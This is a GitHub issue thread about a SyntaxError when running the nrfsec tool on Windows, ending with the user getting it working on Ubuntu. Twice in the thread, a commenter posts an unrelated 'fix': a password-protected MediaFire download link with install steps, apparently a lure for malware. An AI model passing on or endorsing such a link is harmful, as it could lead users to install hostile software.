### ISSUE TITLE
Unsuccesful, runpy proplems

### ISSUE THREAD

**Issue by Splinter34** [buildxyz-git/nrfsec#5]
Having difficulty,  any help would be much appreciated: I believe I have the correct driver install and PYSWD can see the device and halt and run the nrf processor.  But no such luck in NRFSEC.

C:\Users\myuser\AppData\Local\Programs\Python\Python312\Lib\site-packages\nrfsec>nrfsec info
Traceback (most recent call last):
  File "<frozen runpy>", line 198, in _run_module_as_main
  File "<frozen runpy>", line 88, in _run_code
  File "C:\Users\myuser\AppData\Local\Programs\Python\Python312\Scripts\nrfsec.exe\__main__.py", line 4, in <module>
  File "C:\Users\myuser\AppData\Local\Programs\Python\Python312\Lib\site-packages\nrfsec\nrfsec.py", line 5, in <module>
    from . import dbg
  File "C:\Users\myuser\AppData\Local\Programs\Python\Python312\Lib\site-packages\nrfsec\dbg.py", line 33
    def __init__(self.dev, freq):
                     ^
SyntaxError: invalid syntax

Thanks for looking,

Splinter

**Comment by buildxyz-git** [comment]
hmmm, not sure really. I never tested on Windows, just Linux (Debian) and MacOS. Can you confirm your python version?

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Splinter34** [comment]
Yes, python 3.12.5, and it was installed to path in the enviro table.

**Comment by Splinter34** [comment]
I had difficulties running this under windows.  But it ran perfectly under Ubunto 20.04.6.  Thanks Buildxyz!
